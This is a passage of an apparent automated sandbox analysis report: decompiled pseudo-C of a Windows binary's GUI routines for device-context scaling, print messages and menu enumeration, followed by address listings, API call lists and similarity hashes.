                                                                                                                                                                                                                                                                                          											__eflags = _t204;
                                                                                                                                                                                                                                                                                          											_v80 = _t204;
                                                                                                                                                                                                                                                                                          											if(_t204 >= 0) {
                                                                                                                                                                                                                                                                                          												__eflags = _t204 - 0x1fffffff;
                                                                                                                                                                                                                                                                                          												if(_t204 <= 0x1fffffff) {
                                                                                                                                                                                                                                                                                          													goto L18;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_v80 = 1;
                                                                                                                                                                                                                                                                                          											L18:
                                                                                                                                                                                                                                                                                          											_t207 = E00106254( *(_t291 + 0x52c), _v80, 4);
                                                                                                                                                                                                                                                                                          											_t302 = _t302 + 0xc;
                                                                                                                                                                                                                                                                                          											__eflags = _t207;
                                                                                                                                                                                                                                                                                          											if(_t207 != 0) {
                                                                                                                                                                                                                                                                                          												 *(_t291 + 0x534) = _v80;
                                                                                                                                                                                                                                                                                          												 *(_t291 + 0x52c) = _t207;
                                                                                                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										L23:
                                                                                                                                                                                                                                                                                          										_t197 = SendMessageA( *(_t291 + 0x254), 0x439, 0,  &_v76);
                                                                                                                                                                                                                                                                                          										__eflags = _t197 - _v36 - 0xffffffff;
                                                                                                                                                                                                                                                                                          										if(_t197 - _v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          											goto L27;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t278 - _t257 + _t193 * 4;
                                                                                                                                                                                                                                                                                          										if(_t278 < _t257 + _t193 * 4) {
                                                                                                                                                                                                                                                                                          											_push(0x80004005);
                                                                                                                                                                                                                                                                                          											E000F1170(_t278);
                                                                                                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                                                                                                          											__eflags =  *(_t291 + 0x530) - 1;
                                                                                                                                                                                                                                                                                          											E000FCF50( *(_t291 + 0x530) - 1, _t291 + 0x52c);
                                                                                                                                                                                                                                                                                          											_t291 = _v100;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L14;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                                                                                                          								_t270 =  *(_t291 + 0x254);
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t291 + 0x254), 0x439, 0, 0);
                                                                                                                                                                                                                                                                                          								DeleteDC(_t284);
                                                                                                                                                                                                                                                                                          								_t201 = 1;
                                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                                          								L24:
                                                                                                                                                                                                                                                                                          								_v36 = _t197;
                                                                                                                                                                                                                                                                                          								__eflags = _t197 - _v120;
                                                                                                                                                                                                                                                                                          							} while (_t197 < _v120);
                                                                                                                                                                                                                                                                                          							goto L28;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t201 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L29:
                                                                                                                                                                                                                                                                                          						 *[fs:0x0] = _v20;
                                                                                                                                                                                                                                                                                          						_pop(_t285);
                                                                                                                                                                                                                                                                                          						_pop(_t293);
                                                                                                                                                                                                                                                                                          						_pop(_t229);
                                                                                                                                                                                                                                                                                          						__eflags = _v28 ^ _t298;
                                                                                                                                                                                                                                                                                          						return E001059E6(_t201, _t229, _v28 ^ _t298, _t270, _t285, _t293);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t162 -  *((intOrPtr*)(_t283 + 0x4fc));
                                                                                                                                                                                                                                                                                          						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v64 =  *( *((intOrPtr*)(_t283 + 0x4f8)) + _t162 * 4);
                                                                                                                                                                                                                                                                                          							_t211 = GetDeviceCaps(_t289, 0x70);
                                                                                                                                                                                                                                                                                          							SetViewportOrgEx(_t289,  ~_t211,  ~(GetDeviceCaps(_t289, 0x71)), 0);
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t283 + 0x220), 0x439, 1,  &_v136);
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t283 + 0x220), 0x433, 0,  &_v88);
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t283 + 0x220), 0x439, 0, 0);
                                                                                                                                                                                                                                                                                          							_pop(_t286);
                                                                                                                                                                                                                                                                                          							_pop(_t295);
                                                                                                                                                                                                                                                                                          							_pop(_t232);
                                                                                                                                                                                                                                                                                          							__eflags = _v72 ^ _t301;
                                                                                                                                                                                                                                                                                          							return E001059E6(1, _t232, _v72 ^ _t301,  *(_t283 + 0x220), _t286, _t295);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_pop(_t287);
                                                                                                                                                                                                                                                                                          					_pop(_t296);
                                                                                                                                                                                                                                                                                          					_pop(_t233);
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t233, _v8 ^ _t301, __edx, _t287, _t296);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













































































                                                                                                                                                                                                                                                                                          0x000f8c36
                                                                                                                                                                                                                                                                                          0x000f8c39
                                                                                                                                                                                                                                                                                          0x000f8c40
                                                                                                                                                                                                                                                                                          0x000f8c44
                                                                                                                                                                                                                                                                                          0x000f8c49
                                                                                                                                                                                                                                                                                          0x000f8c4d
                                                                                                                                                                                                                                                                                          0x000f8c4f
                                                                                                                                                                                                                                                                                          0x000f8c59
                                                                                                                                                                                                                                                                                          0x000f8c7f
                                                                                                                                                                                                                                                                                          0x000f8c88
                                                                                                                                                                                                                                                                                          0x000f8c8c
                                                                                                                                                                                                                                                                                          0x000f8c8e
                                                                                                                                                                                                                                                                                          0x000f8ca4
                                                                                                                                                                                                                                                                                          0x000f8cb9
                                                                                                                                                                                                                                                                                          0x000f8cc4
                                                                                                                                                                                                                                                                                          0x000f8cc8
                                                                                                                                                                                                                                                                                          0x000f8cda
                                                                                                                                                                                                                                                                                          0x000f8cde
                                                                                                                                                                                                                                                                                          0x000f8ce2
                                                                                                                                                                                                                                                                                          0x000f8cee
                                                                                                                                                                                                                                                                                          0x000f8d05
                                                                                                                                                                                                                                                                                          0x000f8d16
                                                                                                                                                                                                                                                                                          0x000f8d35
                                                                                                                                                                                                                                                                                          0x000f8d3b
                                                                                                                                                                                                                                                                                          0x000f8d41
                                                                                                                                                                                                                                                                                          0x000f8d45
                                                                                                                                                                                                                                                                                          0x000f8d4d
                                                                                                                                                                                                                                                                                          0x000f8d51
                                                                                                                                                                                                                                                                                          0x000f8d55
                                                                                                                                                                                                                                                                                          0x000f8d59
                                                                                                                                                                                                                                                                                          0x000f8d5d
                                                                                                                                                                                                                                                                                          0x000f8d61
                                                                                                                                                                                                                                                                                          0x000f8d69
                                                                                                                                                                                                                                                                                          0x000f8d6d
                                                                                                                                                                                                                                                                                          0x000f8d71
                                                                                                                                                                                                                                                                                          0x000f8d75
                                                                                                                                                                                                                                                                                          0x000f8d79
                                                                                                                                                                                                                                                                                          0x000f8d81
                                                                                                                                                                                                                                                                                          0x000f8d89
                                                                                                                                                                                                                                                                                          0x000f8d8b
                                                                                                                                                                                                                                                                                          0x000f8e25
                                                                                                                                                                                                                                                                                          0x000f8e30
                                                                                                                                                                                                                                                                                          0x000f8e36
                                                                                                                                                                                                                                                                                          0x000f8e37
                                                                                                                                                                                                                                                                                          0x000f8e38
                                                                                                                                                                                                                                                                                          0x000f8e39
                                                                                                                                                                                                                                                                                          0x000f8e3a
                                                                                                                                                                                                                                                                                          0x000f8e3b
                                                                                                                                                                                                                                                                                          0x000f8e3c
                                                                                                                                                                                                                                                                                          0x000f8e3d
                                                                                                                                                                                                                                                                                          0x000f8e3e
                                                                                                                                                                                                                                                                                          0x000f8e3f
                                                                                                                                                                                                                                                                                          0x000f8e41
                                                                                                                                                                                                                                                                                          0x000f8e43
                                                                                                                                                                                                                                                                                          0x000f8e45
                                                                                                                                                                                                                                                                                          0x000f8e50
                                                                                                                                                                                                                                                                                          0x000f8e51
                                                                                                                                                                                                                                                                                          0x000f8e54
                                                                                                                                                                                                                                                                                          0x000f8e59
                                                                                                                                                                                                                                                                                          0x000f8e5b
                                                                                                                                                                                                                                                                                          0x000f8e5e
                                                                                                                                                                                                                                                                                          0x000f8e5f
                                                                                                                                                                                                                                                                                          0x000f8e60
                                                                                                                                                                                                                                                                                          0x000f8e61
                                                                                                                                                                                                                                                                                          0x000f8e65
                                                                                                                                                                                                                                                                                          0x000f8e6b
                                                                                                                                                                                                                                                                                          0x000f8e74
                                                                                                                                                                                                                                                                                          0x000f8e83
                                                                                                                                                                                                                                                                                          0x000f8e85
                                                                                                                                                                                                                                                                                          0x000f8e88
                                                                                                                                                                                                                                                                                          0x000f8e8f
                                                                                                                                                                                                                                                                                          0x000f8e91
                                                                                                                                                                                                                                                                                          0x000f8ea8
                                                                                                                                                                                                                                                                                          0x000f8eb0
                                                                                                                                                                                                                                                                                          0x000f8eb3
                                                                                                                                                                                                                                                                                          0x000f8ec5
                                                                                                                                                                                                                                                                                          0x000f8ee5
                                                                                                                                                                                                                                                                                          0x000f8ef4
                                                                                                                                                                                                                                                                                          0x000f8ef6
                                                                                                                                                                                                                                                                                          0x000f8f01
                                                                                                                                                                                                                                                                                          0x000f8f04
                                                                                                                                                                                                                                                                                          0x000f8f15
                                                                                                                                                                                                                                                                                          0x000f8f18
                                                                                                                                                                                                                                                                                          0x000f8f1b
                                                                                                                                                                                                                                                                                          0x000f8f31
                                                                                                                                                                                                                                                                                          0x000f8f3c
                                                                                                                                                                                                                                                                                          0x000f8f4c
                                                                                                                                                                                                                                                                                          0x000f8f60
                                                                                                                                                                                                                                                                                          0x000f8f6d
                                                                                                                                                                                                                                                                                          0x000f8f73
                                                                                                                                                                                                                                                                                          0x000f8f76
                                                                                                                                                                                                                                                                                          0x000f8f79
                                                                                                                                                                                                                                                                                          0x000f8f82
                                                                                                                                                                                                                                                                                          0x000f8f8b
                                                                                                                                                                                                                                                                                          0x000f8f91
                                                                                                                                                                                                                                                                                          0x000f8f94
                                                                                                                                                                                                                                                                                          0x000f8f9d
                                                                                                                                                                                                                                                                                          0x000f8fa0
                                                                                                                                                                                                                                                                                          0x000f8fa3
                                                                                                                                                                                                                                                                                          0x000f8faa
                                                                                                                                                                                                                                                                                          0x000f8fb7
                                                                                                                                                                                                                                                                                          0x000f8fba
                                                                                                                                                                                                                                                                                          0x000f8fc0
                                                                                                                                                                                                                                                                                          0x000f8fc2
                                                                                                                                                                                                                                                                                          0x000f8fc5
                                                                                                                                                                                                                                                                                          0x000f8fca
                                                                                                                                                                                                                                                                                          0x000f8fcd
                                                                                                                                                                                                                                                                                          0x000f8fcd
                                                                                                                                                                                                                                                                                          0x000f8fd9
                                                                                                                                                                                                                                                                                          0x000f8fdf
                                                                                                                                                                                                                                                                                          0x000f8ff0
                                                                                                                                                                                                                                                                                          0x000f8ff0
                                                                                                                                                                                                                                                                                          0x000f8ff6
                                                                                                                                                                                                                                                                                          0x000f8ffc
                                                                                                                                                                                                                                                                                          0x000f905f
                                                                                                                                                                                                                                                                                          0x000f906b
                                                                                                                                                                                                                                                                                          0x000f906e
                                                                                                                                                                                                                                                                                          0x000f9070
                                                                                                                                                                                                                                                                                          0x000f9075
                                                                                                                                                                                                                                                                                          0x000f9075
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x000f9077
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8ffe
                                                                                                                                                                                                                                                                                          0x000f8ffe
                                                                                                                                                                                                                                                                                          0x000f9004
                                                                                                                                                                                                                                                                                          0x000f9007
                                                                                                                                                                                                                                                                                          0x000f9009
                                                                                                                                                                                                                                                                                          0x000f9016
                                                                                                                                                                                                                                                                                          0x000f9016
                                                                                                                                                                                                                                                                                          0x000f9018
                                                                                                                                                                                                                                                                                          0x000f9029
                                                                                                                                                                                                                                                                                          0x000f9029
                                                                                                                                                                                                                                                                                          0x000f902b
                                                                                                                                                                                                                                                                                          0x000f902e
                                                                                                                                                                                                                                                                                          0x000f9030
                                                                                                                                                                                                                                                                                          0x000f9035
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9035
                                                                                                                                                                                                                                                                                          0x000f901a
                                                                                                                                                                                                                                                                                          0x000f901a
                                                                                                                                                                                                                                                                                          0x000f9037
                                                                                                                                                                                                                                                                                          0x000f9044
                                                                                                                                                                                                                                                                                          0x000f9049
                                                                                                                                                                                                                                                                                          0x000f904c
                                                                                                                                                                                                                                                                                          0x000f904e
                                                                                                                                                                                                                                                                                          0x000f9053
                                                                                                                                                                                                                                                                                          0x000f9059
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9059
                                                                                                                                                                                                                                                                                          0x000f904e
                                                                                                                                                                                                                                                                                          0x000f907d
                                                                                                                                                                                                                                                                                          0x000f908f
                                                                                                                                                                                                                                                                                          0x000f909a
                                                                                                                                                                                                                                                                                          0x000f909d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f900b
                                                                                                                                                                                                                                                                                          0x000f900e
                                                                                                                                                                                                                                                                                          0x000f9010
                                                                                                                                                                                                                                                                                          0x000f90ad
                                                                                                                                                                                                                                                                                          0x000f90b2
                                                                                                                                                                                                                                                                                          0x000f90b7
                                                                                                                                                                                                                                                                                          0x000f90bd
                                                                                                                                                                                                                                                                                          0x000f90c4
                                                                                                                                                                                                                                                                                          0x000f90c9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f9010
                                                                                                                                                                                                                                                                                          0x000f9009
                                                                                                                                                                                                                                                                                          0x000f90cc
                                                                                                                                                                                                                                                                                          0x000f90cc
                                                                                                                                                                                                                                                                                          0x000f90dc
                                                                                                                                                                                                                                                                                          0x000f90e3
                                                                                                                                                                                                                                                                                          0x000f90e9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f909f
                                                                                                                                                                                                                                                                                          0x000f909f
                                                                                                                                                                                                                                                                                          0x000f90a2
                                                                                                                                                                                                                                                                                          0x000f90a2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8e93
                                                                                                                                                                                                                                                                                          0x000f8e93
                                                                                                                                                                                                                                                                                          0x000f8e93
                                                                                                                                                                                                                                                                                          0x000f90eb
                                                                                                                                                                                                                                                                                          0x000f90ee
                                                                                                                                                                                                                                                                                          0x000f90f6
                                                                                                                                                                                                                                                                                          0x000f90f7
                                                                                                                                                                                                                                                                                          0x000f90f8
                                                                                                                                                                                                                                                                                          0x000f90fc
                                                                                                                                                                                                                                                                                          0x000f9106
                                                                                                                                                                                                                                                                                          0x000f8d91
                                                                                                                                                                                                                                                                                          0x000f8d91
                                                                                                                                                                                                                                                                                          0x000f8d97
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f8d9d
                                                                                                                                                                                                                                                                                          0x000f8da9
                                                                                                                                                                                                                                                                                          0x000f8dad
                                                                                                                                                                                                                                                                                          0x000f8dc7
                                                                                                                                                                                                                                                                                          0x000f8de6
                                                                                                                                                                                                                                                                                          0x000f8dfb
                                                                                                                                                                                                                                                                                          0x000f8e0d
                                                                                                                                                                                                                                                                                          0x000f8e13
                                                                                                                                                                                                                                                                                          0x000f8e14
                                                                                                                                                                                                                                                                                          0x000f8e15
                                                                                                                                                                                                                                                                                          0x000f8e16
                                                                                                                                                                                                                                                                                          0x000f8e22
                                                                                                                                                                                                                                                                                          0x000f8e22
                                                                                                                                                                                                                                                                                          0x000f8d97
                                                                                                                                                                                                                                                                                          0x000f8c5b
                                                                                                                                                                                                                                                                                          0x000f8c5d
                                                                                                                                                                                                                                                                                          0x000f8c5e
                                                                                                                                                                                                                                                                                          0x000f8c5f
                                                                                                                                                                                                                                                                                          0x000f8c6e
                                                                                                                                                                                                                                                                                          0x000f8c6e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000006F), ref: 000F8C7A
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000006E), ref: 000F8C83
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000058), ref: 000F8C8C
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,00000000), ref: 000F8C9F
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 000F8CA8
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,00000000), ref: 000F8CB9
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8CE6
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8CFD
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8D14
                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,000005A0,000003E8), ref: 000F8D2B
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000070), ref: 000F8DAD
                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000071), ref: 000F8DB8
                                                                                                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(?,00000000,00000000,00000000), ref: 000F8DC7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$Viewport
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2488934766-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8c9ad0330357da4393018560cc21f050d35f7dc9a469ad5eed698a3a7b6f4791
                                                                                                                                                                                                                                                                                          • Instruction ID: a8ceb79ec72c338a70a19f4c7c91826ad549a28670e6bc54480739f700402174
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c9ad0330357da4393018560cc21f050d35f7dc9a469ad5eed698a3a7b6f4791
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5512A70A58344AFD314CF68DD85B5BF7E9BB8C700F008A1EB698D7280D7B4E9408B96
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                          			E000FE2D0(unsigned int __ecx, intOrPtr __edx, signed char _a4, struct HMENU__* _a8, long* _a12) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				char _v136;
                                                                                                                                                                                                                                                                                          				int _v140;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v144;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v148;
                                                                                                                                                                                                                                                                                          				intOrPtr _v152;
                                                                                                                                                                                                                                                                                          				long _v156;
                                                                                                                                                                                                                                                                                          				signed int _v160;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v208;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                                                                          				long _t94;
                                                                                                                                                                                                                                                                                          				long _t96;
                                                                                                                                                                                                                                                                                          				long _t97;
                                                                                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                                                                                                          				CHAR* _t109;
                                                                                                                                                                                                                                                                                          				int _t113;
                                                                                                                                                                                                                                                                                          				long _t118;
                                                                                                                                                                                                                                                                                          				long* _t121;
                                                                                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t123;
                                                                                                                                                                                                                                                                                          				CHAR* _t126;
                                                                                                                                                                                                                                                                                          				intOrPtr _t127;
                                                                                                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                                                                                                          				signed int _t146;
                                                                                                                                                                                                                                                                                          				intOrPtr _t150;
                                                                                                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t152;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t154;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				int _t156;
                                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                                          				signed int _t163;
                                                                                                                                                                                                                                                                                          				intOrPtr _t164;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t128 = __ecx;
                                                                                                                                                                                                                                                                                          				_t161 = _t163;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F2B5);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t164 = _t163 - 0xc0;
                                                                                                                                                                                                                                                                                          				_t86 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t87 = _t86 ^ _t163;
                                                                                                                                                                                                                                                                                          				_v28 = _t87;
                                                                                                                                                                                                                                                                                          				_push(_t87);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t164;
                                                                                                                                                                                                                                                                                          				_t154 = _a8;
                                                                                                                                                                                                                                                                                          				_t121 = _a12;
                                                                                                                                                                                                                                                                                          				_t150 = __edx;
                                                                                                                                                                                                                                                                                          				_v152 = __edx;
                                                                                                                                                                                                                                                                                          				if(__ecx >> 0x10 == 0) {
                                                                                                                                                                                                                                                                                          					_t145 =  *((intOrPtr*)(__edx + 0x84));
                                                                                                                                                                                                                                                                                          					_t93 = _t145 >> 0x00000001 & 0x00000001;
                                                                                                                                                                                                                                                                                          					__eflags = _t93;
                                                                                                                                                                                                                                                                                          					if(_t93 != 0) {
                                                                                                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                                                                                                          						__eflags = _t93;
                                                                                                                                                                                                                                                                                          						if(_t93 == 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t128;
                                                                                                                                                                                                                                                                                          							if(_t128 != 0) {
                                                                                                                                                                                                                                                                                          								L12:
                                                                                                                                                                                                                                                                                          								_t94 = _t128;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t145 & 0x00000010;
                                                                                                                                                                                                                                                                                          								if((_t145 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t94 = SendMessageA( *(_t150 + 4), 0x447, _t128, _t128);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t145 =  *(_t150 + 0x74);
                                                                                                                                                                                                                                                                                          							_push(_t94);
                                                                                                                                                                                                                                                                                          							_push(_t154);
                                                                                                                                                                                                                                                                                          							_push(_a4);
                                                                                                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t150 + 0x5c)));
                                                                                                                                                                                                                                                                                          							_push( *(_t150 + 0x74));
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _t128;
                                                                                                                                                                                                                                                                                          							if(_t128 != 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_t145 = _a4;
                                                                                                                                                                                                                                                                                          								_push(_t128);
                                                                                                                                                                                                                                                                                          								_push(_t154);
                                                                                                                                                                                                                                                                                          								_push(_a4);
                                                                                                                                                                                                                                                                                          								_push( *(_t150 + 4));
                                                                                                                                                                                                                                                                                          								_push( *((intOrPtr*)(_t150 + 0x40)));
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t145 & 0x00000010;
                                                                                                                                                                                                                                                                                          								if((_t145 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t118 = SendMessageA( *(_t150 + 4), 0x447, _t128, _t128);
                                                                                                                                                                                                                                                                                          									_t145 = _a4;
                                                                                                                                                                                                                                                                                          									_push(_t118);
                                                                                                                                                                                                                                                                                          									_push(_t154);
                                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                                          									_push( *(_t150 + 4));
                                                                                                                                                                                                                                                                                          									_push( *((intOrPtr*)(_t150 + 0x40)));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t96 = CallWindowProcA();
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t150 + 0x84) & 0x00000004;
                                                                                                                                                                                                                                                                                          						_v156 = _t96;
                                                                                                                                                                                                                                                                                          						if(( *(_t150 + 0x84) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          							L39:
                                                                                                                                                                                                                                                                                          							_t97 = _v156;
                                                                                                                                                                                                                                                                                          							goto L40;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t123 = _t154;
                                                                                                                                                                                                                                                                                          							_v144 = _t123;
                                                                                                                                                                                                                                                                                          							_t156 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_v140 = _t156;
                                                                                                                                                                                                                                                                                          								_t99 = GetMenuItemCount(_t123);
                                                                                                                                                                                                                                                                                          								__eflags = _t156 - _t99;
                                                                                                                                                                                                                                                                                          								if(_t156 >= _t99) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E00106820( &_v208, 0, 0x30);
                                                                                                                                                                                                                                                                                          								_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                                                                          								_v208.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								_t103 = E000F4890(_t123, _t150, _t156);
                                                                                                                                                                                                                                                                                          								__eflags = _t103;
                                                                                                                                                                                                                                                                                          								if(_t103 != 0) {
                                                                                                                                                                                                                                                                                          									_v208.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t145 =  &_v208;
                                                                                                                                                                                                                                                                                          								_v208.cch = 0x64;
                                                                                                                                                                                                                                                                                          								_v208.fMask = 0x3f;
                                                                                                                                                                                                                                                                                          								_v208.dwTypeData =  &_v136;
                                                                                                                                                                                                                                                                                          								GetMenuItemInfoA(_t123, _t156, 1,  &_v208);
                                                                                                                                                                                                                                                                                          								__eflags = _v208.fType & 0x00000100;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L37:
